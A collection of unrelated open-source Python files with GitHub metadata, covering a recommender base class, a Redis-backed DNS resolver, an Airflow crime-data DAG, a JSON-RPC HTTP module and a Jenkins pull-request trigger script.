SEPARATOR_RE = re.compile(r' |_|-|\.')
def camelcase(str, capital=False):
"""Convert string str with ' ', '_', '.' or '-' separators to camelCase."""
if not str: return ''
words = SEPARATOR_RE.split(str)
first = words[0]
if capital: first = first[0].upper() + first[1:]
return first + ''.join([w.capitalize() for w in words[1:]])
CAPS_RE = re.compile('[A-Z]')
def uncamelcase(str, separator='_'):
"""Convert camelCase string str to string with separator, e.g. camel_case"""
if len(str) == 0: return str
return str[0] + CAPS_RE.sub(lambda m: separator+m.group(0).lower(), str[1:])
|
{
"content_hash": "72166a3761d3b3450058bcdd6949fb7e",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 92,
"avg_line_length": 31.8,
"alnum_prop": 0.6088534107402032,
"repo_name": "irinabov/debian-qpid-dispatch",
"id": "a7d703a2427e54101d288f3f54a04a9c8a1a4fdf",
"size": "4923",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/qpid_dispatch/management/entity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1954231"
},
{
"name": "C++",
"bytes": "58231"
},
{
"name": "CMake",
"bytes": "42570"
},
{
"name": "CSS",
"bytes": "24393"
},
{
"name": "Dockerfile",
"bytes": "3278"
},
{
"name": "HTML",
"bytes": "2320"
},
{
"name": "JavaScript",
"bytes": "719793"
},
{
"name": "Python",
"bytes": "2115168"
},
{
"name": "Shell",
"bytes": "34107"
}
],
"symlink_target": ""
}
|
"""
The :mod:`surprise.prediction_algorithms.algo_base` module defines the base
class :class:`AlgoBase` from which every single prediction algorithm has to
inherit.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from .. import similarities as sims
from .predictions import PredictionImpossible
from .predictions import Prediction
from .optimize_baselines import baseline_als
from .optimize_baselines import baseline_sgd
class AlgoBase:
"""Abstract class where is defined the basic behavior of a prediction
algorithm.
Keyword Args:
baseline_options(dict, optional): If the algorithm needs to compute a
baseline estimate, the ``baseline_options`` parameter is used to
configure how they are computed. See
:ref:`baseline_estimates_configuration` for usage.
"""
def __init__(self, **kwargs):
self.bsl_options = kwargs.get('bsl_options', {})
self.sim_options = kwargs.get('sim_options', {})
if 'user_based' not in self.sim_options:
self.sim_options['user_based'] = True
def train(self, trainset):
"""Train an algorithm on a given training set.
This method is called by every derived class as the first basic step
for training an algorithm. It basically just initializes some internal
structures and set the self.trainset attribute.
Args:
trainset(:obj:`Trainset <surprise.dataset.Trainset>`) : A training
set, as returned by the :meth:`folds
<surprise.dataset.Dataset.folds>` method.
"""
self.trainset = trainset
# (re) Initialise baselines
self.bu = self.bi = None
def predict(self, uid, iid, r_ui=None, clip=True, verbose=False):
"""Compute the rating prediction for given user and item.
The ``predict`` method converts raw ids to inner ids and then calls the
``estimate`` method which is defined in every derived class. If the
prediction is impossible (for whatever reason), the prediction is set
to the global mean of all ratings.
Args:
uid: (Raw) id of the user. See :ref:`this note<raw_inner_note>`.
iid: (Raw) id of the item. See :ref:`this note<raw_inner_note>`.
r_ui(float): The true rating :math:`r_{ui}`. Optional, default is
``None``.
clip(bool): Whether to clip the estimation into the rating scale.
For example, if :math:`\\hat{r}_{ui}` is :math:`5.5` while the
rating scale is :math:`[1, 5]`, then :math:`\\hat{r}_{ui}` is
set to :math:`5`. Same goes if :math:`\\hat{r}_{ui} < 1`.
Default is ``True``.
verbose(bool): Whether to print details of the prediction. Default
is False.
Returns:
A :obj:`Prediction\
<surprise.prediction_algorithms.predictions.Prediction>` object
containing:
- The (raw) user id ``uid``.
- The (raw) item id ``iid``.
- The true rating ``r_ui`` (:math:`\\hat{r}_{ui}`).
- The estimated rating (:math:`\\hat{r}_{ui}`).
- Some additional details about the prediction that might be useful
for later analysis.
"""
# Convert raw ids to inner ids
try:
iuid = self.trainset.to_inner_uid(uid)
except ValueError:
iuid = 'UKN__' + str(uid)
try:
iiid = self.trainset.to_inner_iid(iid)
except ValueError:
iiid = 'UKN__' + str(iid)
details = {}
try:
est = self.estimate(iuid, iiid)
# If the details dict was also returned
if isinstance(est, tuple):
est, details = est
details['was_impossible'] = False
except PredictionImpossible as e:
est = self.trainset.global_mean
details['was_impossible'] = True
details['reason'] = str(e)
# Remap the rating into its initial rating scale (because the rating
# scale was translated so that ratings are all >= 1)
est -= self.trainset.offset
# clip estimate into [lower_bound, higher_bound]
if clip:
lower_bound, higher_bound = self.trainset.rating_scale
est = min(higher_bound, est)
est = max(lower_bound, est)
pred = Prediction(uid, iid, r_ui, est, details)
if verbose:
print(pred)
return pred
def test(self, testset, verbose=False):
"""Test the algorithm on given testset, i.e. estimate all the ratings
in the given testset.
Args:
testset: A test set, as returned by the :meth:`folds()
<surprise.dataset.Dataset.folds>` method or by the
:meth:`build_testset()
<surprise.dataset.Trainset.build_testset>` method.
verbose(bool): Whether to print details for each predictions.
Default is False.
Returns:
A list of :class:`Prediction\
<surprise.prediction_algorithms.predictions.Prediction>` objects
that contains all the estimated ratings.
"""
# The ratings are translated back to their original scale.
predictions = [self.predict(uid,
iid,
r_ui_trans - self.trainset.offset,
verbose=verbose)
for (uid, iid, r_ui_trans) in testset]
return predictions
def compute_baselines(self):
"""Compute users and items baselines.
The way baselines are computed depends on the ``bsl_options`` parameter
passed at the creation of the algorithm (see
:ref:`baseline_estimates_configuration`).
This method is only relevant for algorithms using :func:`Pearson
baseline similarty<surprise.similarities.pearson_baseline>` or the
:class:`BaselineOnly
<surprise.prediction_algorithms.baseline_only.BaselineOnly>` algorithm.
Returns:
A tuple ``(bu, bi)``, which are users and items baselines."""
# Firt of, if this method has already been called before on the same
# trainset, then just return. Indeed, compute_baselines may be called
# more than one time, for example when a similarity metric (e.g.
# pearson_baseline) uses baseline estimates.
if self.bu is not None:
return self.bu, self.bi
method = dict(als=baseline_als,
sgd=baseline_sgd)
method_name = self.bsl_options.get('method', 'als')
try:
print('Estimating biases using', method_name + '...')
self.bu, self.bi = method[method_name](self)
return self.bu, self.bi
except KeyError:
raise ValueError('Invalid method ' + method_name +
' for baseline computation.' +
' Available methods are als and sgd.')
def compute_similarities(self):
"""Build the similarity matrix.
The way the similarity matrix is computed depends on the
``sim_options`` parameter passed at the creation of the algorithm (see
:ref:`similarity_measures_configuration`).
This method is only relevant for algorithms using a similarity measure,
such as the :ref:`k-NN algorithms <pred_package_knn_inpired>`.
Returns:
The similarity matrix."""
construction_func = {'cosine': sims.cosine,
'msd': sims.msd,
'pearson': sims.pearson,
'pearson_baseline': sims.pearson_baseline}
if self.sim_options['user_based']:
n_x, yr = self.trainset.n_users, self.trainset.ir
else:
n_x, yr = self.trainset.n_items, self.trainset.ur
min_support = self.sim_options.get('min_support', 1)
args = [n_x, yr, min_support]
name = self.sim_options.get('name', 'msd').lower()
if name == 'pearson_baseline':
shrinkage = self.sim_options.get('shrinkage', 100)
bu, bi = self.compute_baselines()
if self.sim_options['user_based']:
bx, by = bu, bi
else:
bx, by = bi, bu
args += [self.trainset.global_mean, bx, by, shrinkage]
try:
print('Computing the {0} similarity matrix...'.format(name))
sim = construction_func[name](*args)
print('Done computing similarity matrix.')
return sim
except KeyError:
raise NameError('Wrong sim name ' + name + '. Allowed values ' +
'are ' + ', '.join(construction_func.keys()) + '.')
def get_neighbors(self, iid, k):
"""Return the ``k`` nearest neighbors of ``iid``, which is the inner id
of a user or an item, depending on the ``user_based`` field of
``sim_options`` (see :ref:`similarity_measures_configuration`).
As the similarities are computed on the basis of a similarity measure,
this method is only relevant for algorithms using a similarity measure,
such as the :ref:`k-NN algorithms <pred_package_knn_inpired>`.
For a usage example, see the :ref:`FAQ <get_k_nearest_neighbors>`.
Args:
iid(int): The (inner) id of the user (or item) for which we want
the nearest neighbors. See :ref:`this note<raw_inner_note>`.
k(int): The number of neighbors to retrieve.
Returns:
The list of the ``k`` (inner) ids of the closest users (or items)
to ``iid``.
"""
if self.sim_options['user_based']:
all_instances = self.trainset.all_users
else:
all_instances = self.trainset.all_items
others = [(x, self.sim[iid, x]) for x in all_instances() if x != iid]
others.sort(key=lambda tple: tple[1], reverse=True)
k_nearest_neighbors = [j for (j, _) in others[:k]]
return k_nearest_neighbors
|
{
"content_hash": "786201f054be95280544b2d2a5db1b5b",
"timestamp": "",
"source": "github",
"line_count": 269,
"max_line_length": 79,
"avg_line_length": 38.342007434944236,
"alnum_prop": 0.5782431646305992,
"repo_name": "charmoniumQ/Surprise",
"id": "8f88186404663f0331392a95bc18d7c6597fa44b",
"size": "10314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "surprise/prediction_algorithms/algo_base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "177820"
}
],
"symlink_target": ""
}
|
from distutils.core import setup, Extension
import os
ROOT = os.path.dirname(__file__)
module1 = Extension(
'prefixtrie',
include_dirs = [
os.path.join(ROOT, os.pardir, os.pardir, "C++", "prefixtrie"),
],
sources = ['prefixtrie.cpp'],
extra_compile_args = ['-std=c++11', '-g']
)
setup(
name = 'prefixtrie',
author = "Aaron France",
author_email = "aaron.l.france@gmail.com",
version = '0.1',
description = "Prefix Trie",
long_description = "Prefix Trie. Written in C++11.",
ext_modules = [module1]
)
|
{
"content_hash": "d59f72411392ed8e9f18e5b725014d3f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 70,
"avg_line_length": 24.82608695652174,
"alnum_prop": 0.5919439579684763,
"repo_name": "AeroNotix/algostructure",
"id": "8ecf1c1e8f4b642a0c2b2cb9925faf23b121b874",
"size": "571",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CPython/prefixtrie/setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "2244"
},
{
"name": "C++",
"bytes": "24982"
},
{
"name": "Clojure",
"bytes": "447"
},
{
"name": "Common Lisp",
"bytes": "2897"
},
{
"name": "D",
"bytes": "711"
},
{
"name": "Erlang",
"bytes": "11990"
},
{
"name": "Go",
"bytes": "10886"
},
{
"name": "Haskell",
"bytes": "969"
},
{
"name": "Java",
"bytes": "4504"
},
{
"name": "Makefile",
"bytes": "5363"
},
{
"name": "OCaml",
"bytes": "774"
},
{
"name": "Python",
"bytes": "9412"
},
{
"name": "Racket",
"bytes": "1575"
},
{
"name": "Scala",
"bytes": "1182"
}
],
"symlink_target": ""
}
|
"""
** OBS This module is not yet used by Evennia **
Example module holding functions for out-of-band protocols to
import and map to given commands from the client. This module
is selected by settings.OOB_FUNC_MODULE.
All functions defined global in this module will be available
for the oob system to call. They will be called with a session/character
as first argument (depending on if the session is logged in or not),
following by any number of extra arguments. The return value will
be packed and returned to the oob protocol and can be on any form.
"""
def testoob(character, *args, **kwargs):
"Simple test function"
print "Called testoob: %s" % val
return "testoob did stuff to the input string '%s'!" % val
# MSDP_MAP is a standard suggestions for making it easy to create generic guis.
# this maps MSDP command names to Evennia commands found in OOB_FUNC_MODULE. It
# is up to these commands to return data on proper form.
MSDP_REPORTABLE = {
# General
"CHARACTER_NAME": "get_character_name",
"SERVER_ID": "get_server_id",
"SERVER_TIME": "get_server_time",
# Character
"AFFECTS": "char_affects",
"ALIGNMENT": "char_alignment",
"EXPERIENCE": "char_experience",
"EXPERIENCE_MAX": "char_experience_max",
"EXPERIENCE_TNL": "char_experience_tnl",
"HEALTH": "char_health",
"HEALTH_MAX": "char_health_max",
"LEVEL": "char_level",
"RACE": "char_race",
"CLASS": "char_class",
"MANA": "char_mana",
"MANA_MAX": "char_mana_max",
"WIMPY": "char_wimpy",
"PRACTICE": "char_practice",
"MONEY": "char_money",
"MOVEMENT": "char_movement",
"MOVEMENT_MAX": "char_movement_max",
"HITROLL": "char_hitroll",
"DAMROLL": "char_damroll",
"AC": "char_ac",
"STR": "char_str",
"INT": "char_int",
"WIS": "char_wis",
"DEX": "char_dex",
"CON": "char_con",
# Combat
"OPPONENT_HEALTH": "opponent_health",
"OPPONENT_HEALTH_MAX":"opponent_health_max",
"OPPONENT_LEVEL": "opponent_level",
"OPPONENT_NAME": "opponent_name",
# World
"AREA_NAME": "area_name",
"ROOM_EXITS": "area_room_exits",
"ROOM_NAME": "room_name",
"ROOM_VNUM": "room_dbref",
"WORLD_TIME": "world_time",
# Configurable variables
"CLIENT_ID": "client_id",
"CLIENT_VERSION": "client_version",
"PLUGIN_ID": "plugin_id",
"ANSI_COLORS": "ansi_colours",
"XTERM_256_COLORS": "xterm_256_colors",
"UTF_8": "utf_8",
"SOUND": "sound",
"MXP": "mxp",
# GUI variables
"BUTTON_1": "button1",
"BUTTON_2": "button2",
"BUTTON_3": "button3",
"BUTTON_4": "button4",
"BUTTON_5": "button5",
"GAUGE_1": "gauge1",
"GAUGE_2": "gauge2",
"GAUGE_3": "gauge3",
"GAUGE_4": "gauge4",
"GAUGE_5": "gauge5"}
|
{
"content_hash": "dfc51db0b6f6c4dea04487d4ffff77de",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 79,
"avg_line_length": 29.978494623655912,
"alnum_prop": 0.6255380200860832,
"repo_name": "TaliesinSkye/evennia",
"id": "ab3ca66e9bf8ac9dd92b222bf40c1973dd86c7bc",
"size": "2788",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wintersoasis-master/conf/examples/oobfuncs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "59698"
},
{
"name": "D",
"bytes": "9343933"
},
{
"name": "Emacs Lisp",
"bytes": "2734"
},
{
"name": "JavaScript",
"bytes": "91190"
},
{
"name": "Python",
"bytes": "2840755"
},
{
"name": "Shell",
"bytes": "4577"
}
],
"symlink_target": ""
}
|
"""
Script to cache anonymous houseprint data into hp_anonymous.pkl
Created on 05/07/2014 by Roel De Coninck
"""
import os, sys
import inspect
script_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# add the path to opengrid to sys.path
sys.path.append(os.path.join(script_dir, os.pardir, os.pardir))
from opengrid.library import config
from opengrid.library.houseprint import houseprint
##############################################################################
c = config.Config()
gjson = c.get('houseprint','json')
hp = houseprint.Houseprint(gjson)
print('Sensor data fetched')
hp.save('new_houseprint.pkl')
|
{
"content_hash": "b6249498b74927a9f211643888f022c8",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 86,
"avg_line_length": 26.26923076923077,
"alnum_prop": 0.6412884333821376,
"repo_name": "MatteusDeloge/opengrid",
"id": "fca7be3147e819ac38c9b6e1925f4860505ecd65",
"size": "708",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "notebooks/cache_anonymous_houseprint.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "243319"
},
{
"name": "Jupyter Notebook",
"bytes": "104480"
},
{
"name": "Python",
"bytes": "173204"
},
{
"name": "Shell",
"bytes": "308"
}
],
"symlink_target": ""
}
|
from twisted.names import dns, server, client, cache
from twisted.application import service, internet
from twisted.internet import defer
from twisted.python import log
import txredisapi
class RedisResolverBackend(client.Resolver):
def __init__(self, redis, servers=None):
self.redis = redis
client.Resolver.__init__(self, servers=servers)
self.ttl = 5
@defer.inlineCallbacks
def _get_ip_addr(self, hostname, timeout):
ip = yield self.redis.get(hostname)
log.msg('redis: %s'% ip)
r = None
if ip:
defer.returnValue([(dns.RRHeader(hostname, dns.A, dns.IN, self.ttl, dns.Record_A(ip, self.ttl)),), (), ()])
else:
i = yield self._lookup(hostname, dns.IN, dns.A, timeout)
defer.returnValue(i)
def lookupAddress(self, name, timeout = None):
return self._get_ip_addr(name, timeout)
def create_application():
rd = txredisapi.lazyConnectionPool()
redisBackend = RedisResolverBackend(rd, servers=[('8.8.8.8', 53)])
application = service.Application("txdnsredis")
srv_collection = service.IServiceCollection(application)
dnsFactory = server.DNSServerFactory(caches=[cache.CacheResolver()], clients=[redisBackend])
internet.TCPServer(53, dnsFactory).setServiceParent(srv_collection)
internet.UDPServer(53, dns.DNSDatagramProtocol(dnsFactory)).setServiceParent(srv_collection)
return application
# .tac app
application = create_application()
|
{
"content_hash": "42105212c8cbb71f5eab7190db20c2ef",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 119,
"avg_line_length": 36.41463414634146,
"alnum_prop": 0.6878767582049564,
"repo_name": "nbari/my-sandbox",
"id": "2b8e8548f7134780033fa448d0cf4e9ffbd5a53d",
"size": "1812",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/DNS/txredns.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "5321"
},
{
"name": "HTML",
"bytes": "53098"
},
{
"name": "PHP",
"bytes": "5266"
},
{
"name": "Python",
"bytes": "240689"
},
{
"name": "Shell",
"bytes": "5076"
}
],
"symlink_target": ""
}
|
from airflow import DAG
from airflow.providers.google.cloud.operators import kubernetes_engine
from airflow.providers.google.cloud.transfers import gcs_to_bigquery
default_args = {
"owner": "Google",
"depends_on_past": False,
"start_date": "2021-03-01",
}
with DAG(
dag_id="chicago_crime.crime",
default_args=default_args,
max_active_runs=1,
schedule_interval="@daily",
catchup=False,
default_view="graph",
) as dag:
create_cluster = kubernetes_engine.GKECreateClusterOperator(
task_id="create_cluster",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
body={
"name": "chicago-crime--crime",
"initial_node_count": 1,
"network": "{{ var.value.vpc_network }}",
"node_config": {
"machine_type": "e2-standard-2",
"oauth_scopes": [
"https://www.googleapis.com/auth/devstorage.read_write",
"https://www.googleapis.com/auth/cloud-platform",
],
},
},
)
# Run CSV transform within kubernetes pod
chicago_crime_transform_csv = kubernetes_engine.GKEStartPodOperator(
task_id="chicago_crime_transform_csv",
startup_timeout_seconds=600,
name="crime",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="chicago-crime--crime",
namespace="default",
image_pull_policy="Always",
image="{{ var.json.chicago_crime.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "https://data.cityofchicago.org/api/views/ijzp-q8t2/rows.csv",
"SOURCE_FILE": "files/data.csv",
"TARGET_FILE": "files/data_output.csv",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "data/chicago_crime/crime/data_output.csv",
"CHUNK_SIZE": "1000000",
},
)
# Task to load CSV data to a BigQuery table
load_chicago_crime_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_chicago_crime_to_bq",
bucket="{{ var.value.composer_bucket }}",
source_objects=["data/chicago_crime/crime/data_output.csv"],
source_format="CSV",
destination_project_dataset_table="chicago_crime.crime",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{"name": "unique_key", "type": "integer", "mode": "required"},
{"name": "case_number", "type": "string", "mode": "nullable"},
{"name": "date", "type": "timestamp", "mode": "nullable"},
{"name": "block", "type": "string", "mode": "nullable"},
{"name": "iucr", "type": "string", "mode": "nullable"},
{"name": "primary_type", "type": "string", "mode": "nullable"},
{"name": "description", "type": "string", "mode": "nullable"},
{"name": "location_description", "type": "string", "mode": "nullable"},
{"name": "arrest", "type": "boolean", "mode": "nullable"},
{"name": "domestic", "type": "boolean", "mode": "nullable"},
{"name": "beat", "type": "integer", "mode": "nullable"},
{"name": "district", "type": "integer", "mode": "nullable"},
{"name": "ward", "type": "integer", "mode": "nullable"},
{"name": "community_area", "type": "integer", "mode": "nullable"},
{"name": "fbi_code", "type": "string", "mode": "nullable"},
{"name": "x_coordinate", "type": "float", "mode": "nullable"},
{"name": "y_coordinate", "type": "float", "mode": "nullable"},
{"name": "year", "type": "integer"},
{"name": "updated_on", "type": "timestamp", "mode": "nullable"},
{"name": "latitude", "type": "float", "mode": "nullable"},
{"name": "longitude", "type": "float", "mode": "nullable"},
{"name": "location", "type": "string", "mode": "nullable"},
],
)
delete_cluster = kubernetes_engine.GKEDeleteClusterOperator(
task_id="delete_cluster",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
name="chicago-crime--crime",
)
(
create_cluster
>> chicago_crime_transform_csv
>> load_chicago_crime_to_bq
>> delete_cluster
)
|
{
"content_hash": "01e93a8ba950444514f4358cb6d40868",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 88,
"avg_line_length": 42.39047619047619,
"alnum_prop": 0.5472927432037744,
"repo_name": "GoogleCloudPlatform/public-datasets-pipelines",
"id": "1378546471c61d3e13ad60b309dd693fab117d3e",
"size": "5028",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "datasets/chicago_crime/pipelines/crime/crime_dag.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "101888"
},
{
"name": "HCL",
"bytes": "678082"
},
{
"name": "Jinja",
"bytes": "12539"
},
{
"name": "Jupyter Notebook",
"bytes": "655592"
},
{
"name": "Python",
"bytes": "4784376"
}
],
"symlink_target": ""
}
|
import sys
import urllib2
import base64
import BaseHTTPServer
import SocketServer
import httplib
import urllib
import urlparse
from StringIO import StringIO
import gzip
import rpcrequest
import rpcresponse
import rpcerror
import rpclib
from rpcjson import json
def http_request(url, json_string, username = None, password = None):
"""
Fetch data from webserver (POST request)
:param json_string: JSON-String
:param username: If *username* is given, BASE authentication will be used.
"""
request = urllib2.Request(url, data = json_string)
request.add_header("Content-Type", "application/json")
request.add_header("Content-Length", len(json_string))
if username:
base64string = base64.encodestring('%s:%s' % (username, password))[:-1]
request.add_header("Authorization", "Basic %s" % base64string)
# enable gzip content
request.add_header('Accept-encoding', 'gzip')
response = urllib2.urlopen(request)
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO( response.read() )
f = gzip.GzipFile(fileobj=buf)
response_string = f.read()
else:
response_string = response.read()
response.close()
return response_string
class HttpClient(object):
class _Method(object):
def __init__(self, http_client_instance, method):
self.http_client_instance = http_client_instance
self.method = method
def __call__(self, *args, **kwargs):
return self.http_client_instance.call(self.method, *args, **kwargs)
def __init__(
self,
url,
username = None,
password = None
):
"""
:param: URL to the JSON-RPC handler on the HTTP-Server.
Example: ``"https://example.com/jsonrpc"``
:param username: If *username* is given, BASE authentication will be used.
:param password: Password for BASE authentication.
"""
self.url = url
self.username = username
self.password = password
def call(self, method, *args, **kwargs):
"""
Creates the JSON-RPC request string, calls the HTTP server, converts
JSON-RPC response string to python and returns the result.
:param method: Name of the method which will be called on the HTTP server.
Or a list with RPC-Request-Dictionaries. Syntax::
"<MethodName>" or [<JsonRpcRequestDict>, ...]
RPC-Request-Dictionaries will be made with the function
*rpcrequest.create_request_dict()*.
"""
# Create JSON-RPC-request
if isinstance(method, basestring):
request_json = rpcrequest.create_request_json(method, *args, **kwargs)
else:
request_json = json.dumps(method)
assert not args and not kwargs
# Call the HTTP-JSON-RPC server
response_json = http_request(
url = self.url,
json_string = request_json,
username = self.username,
password = self.password
)
# Convert JSON-RPC-response to python-object
response = rpcresponse.parse_response_json(response_json)
if response.error:
# Raise error
raise rpcerror.jsonrpcerrors[response.error.code](
message = response.error.message,
data = response.error.data
)
else:
# Return result
return response.result
def __call__(self, method, *args, **kwargs):
"""
Redirects the direct call to *self.call*
"""
return self.call(method, *args, **kwargs)
def __getattr__(self, method):
"""
Allows the usage of attributes as *method* names.
"""
return self._Method(http_client_instance = self, method = method)
class ThreadingHttpServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""
Threading HTTP Server
"""
pass
class HttpRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler, rpclib.JsonRpc):
"""
HttpRequestHandler for JSON-RPC-Requests
Info: http://www.simple-is-better.org/json-rpc/transport_http.html
"""
protocol_version = "HTTP/1.1"
#server_version = "BaseHTTP/" + __version__
def set_content_type_json(self):
"""
Set content-type to "application/json"
"""
self.send_header("Content-Type", "application/json")
def set_no_cache(self):
"""
Disable caching
"""
self.send_header("Cache-Control", "no-cache")
self.send_header("Pragma", "no-cache")
def set_content_length(self, length):
"""
Set content-length-header
"""
self.send_header("Content-Length", str(length))
def do_GET(self):
"""
Handles HTTP-GET-Request
"""
# Parse URL query
query = urlparse.parse_qs(urllib.splitquery(self.path)[1])
# jsonrpc
jsonrpc = query.get("jsonrpc")
if jsonrpc:
jsonrpc = jsonrpc[0]
# id
id = query.get("id")
if id:
id = id[0]
# method
method = query.get("method")
if method:
method = method[0]
# params
args = []
kwargs = {}
params = query.get("params")
if params:
params = json.loads(params[0])
if isinstance(params, list):
args = params
kwargs = {}
elif isinstance(params, dict):
args = []
kwargs = params
# Create JSON reqeust string
request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
request_dict["jsonrpc"] = jsonrpc
request_dict["id"] = id
request_json = json.dumps(request_dict)
# Call
response_json = self.call(request_json)
# Return result
self.send_response(code = httplib.OK)
self.set_content_type_json()
self.set_no_cache()
self.set_content_length(len(response_json))
self.end_headers()
self.wfile.write(response_json)
def do_POST(self):
"""
Handles HTTP-POST-Request
"""
# Read JSON request
content_length = int(self.headers.get("Content-Length", 0))
request_json = self.rfile.read(content_length)
# Call
response_json = self.call(request_json)
# Return result
self.send_response(code = httplib.OK)
self.set_content_type_json()
self.set_no_cache()
self.set_content_length(len(response_json))
self.end_headers()
self.wfile.write(response_json)
return
def handle_cgi_request(methods = None):
"""
Gets the JSON-RPC request from CGI environment and returns the
result to STDOUT
"""
import cgi
import cgitb
cgitb.enable()
# get response-body
request_json = sys.stdin.read()
if request_json:
# POST
request_json = urlparse.unquote(request_json)
else:
# GET
args = []
kwargs = {}
fields = cgi.FieldStorage()
jsonrpc = fields.getfirst("jsonrpc")
id = fields.getfirst("id")
method = fields.getfirst("method")
params = fields.getfirst("params")
if params:
params = json.loads(params)
if isinstance(params, list):
args = params
kwargs = {}
elif isinstance(params, dict):
args = []
kwargs = params
# Create JSON reqeust string
request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
request_dict["jsonrpc"] = jsonrpc
request_dict["id"] = id
request_json = json.dumps(request_dict)
# Call
response_json = rpclib.JsonRpc(methods = methods).call(request_json)
# Return headers
print "Content-Type: application/json"
print "Cache-Control: no-cache"
print "Pragma: no-cache"
print
# Return result
print response_json
|
{
"content_hash": "390a90be25b5287158daf1d5f1b12674",
"timestamp": "",
"source": "github",
"line_count": 308,
"max_line_length": 82,
"avg_line_length": 26.5487012987013,
"alnum_prop": 0.581264522440993,
"repo_name": "moritz-wundke/Concurrent",
"id": "8041fb3ea71939a6f22cebb9372f83f790bef1c6",
"size": "8216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "concurrent/core/transport/pyjsonrpc/http.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "93243"
},
{
"name": "Python",
"bytes": "511887"
},
{
"name": "Shell",
"bytes": "7035"
}
],
"symlink_target": ""
}
|
import os
import requests
import datetime
import re
import json
import sys
import traceback
url = 'https://api.github.com/repos/cocos2d/cocos2d-x/pulls?state=open&sort=created&direction=desc'
job_trigger_url=os.environ['JOB_PULL_REQUEST_BUILD_TRIGGER_URL']
access_token = os.environ['GITHUB_ACCESS_TOKEN']
Headers = {"Authorization":"token " + access_token}
def main():
r = requests.get(url,headers=Headers)
payload = r.json()
print payload
for pr in payload:
pr_num = pr['number']
r = requests.get(pr['url']+"/commits",headers=Headers)
commits = r.json()
#print commits
last_commit = commits[len(commits)-1]
message = last_commit['commit']['message']
#print message
pattern = re.compile("\[ci(\s+)skip\]", re.I)
result_commit_title = pattern.search(message)
title = pr['title']
result_pr_title = pattern.search(title)
if result_commit_title is not None or result_pr_title is not None:
print 'skip build for pull request #' + str(pr_num)
break
#return(0)
s = pr['statuses_url']
update_time = pr['updated_at']
print pr_num
print s
print update_time
t = datetime.datetime.strptime(update_time, "%Y-%m-%dT%H:%M:%SZ")
now = datetime.datetime.utcnow()
three_minutes = datetime.timedelta(seconds=3*60)
if (t + three_minutes < now):
#print pr_num
statuses = requests.get(s, headers=Headers)
#print statuses.json()
if(len(statuses.json()) < 1):
print pr_num
payload_forward = {}
payload_forward['number']=pr_num
payload_forward['action']=pr['state']
payload_forward['html_url']=pr['html_url']
payload_forward['statuses_url']=pr['statuses_url']
payload_forward['branch']=pr['base']['ref']
print payload_forward
post_data = {'payload':""}
post_data['payload']= json.dumps(payload_forward)
requests.post(job_trigger_url, data=post_data)
# -------------- main --------------
if __name__ == '__main__':
sys_ret = 0
try:
main()
except:
traceback.print_exc()
sys_ret = 1
finally:
sys.exit(sys_ret)
|
{
"content_hash": "20c32c4e9ca40d4dc36d065113296b90",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 99,
"avg_line_length": 29.183098591549296,
"alnum_prop": 0.6443050193050193,
"repo_name": "dios-game/dios-cocos",
"id": "cb8b301850031dd50fc59635ab2a9c5162b13428",
"size": "2158",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "src/oslibs/cocos/cocos-src/tools/jenkins-scripts/master-scripts/github-pr-watchdog.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "125794"
},
{
"name": "C",
"bytes": "3815020"
},
{
"name": "C++",
"bytes": "38139132"
},
{
"name": "CMake",
"bytes": "405048"
},
{
"name": "GLSL",
"bytes": "90557"
},
{
"name": "HTML",
"bytes": "15373"
},
{
"name": "Java",
"bytes": "2406393"
},
{
"name": "JavaScript",
"bytes": "11539881"
},
{
"name": "Lua",
"bytes": "6979760"
},
{
"name": "Makefile",
"bytes": "101523"
},
{
"name": "Objective-C",
"bytes": "1983529"
},
{
"name": "Objective-C++",
"bytes": "759608"
},
{
"name": "Python",
"bytes": "1025018"
},
{
"name": "Shell",
"bytes": "116857"
}
],
"symlink_target": ""
}
|
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def run_test():
TestRunner = get_runner(settings)
test_runner = TestRunner()
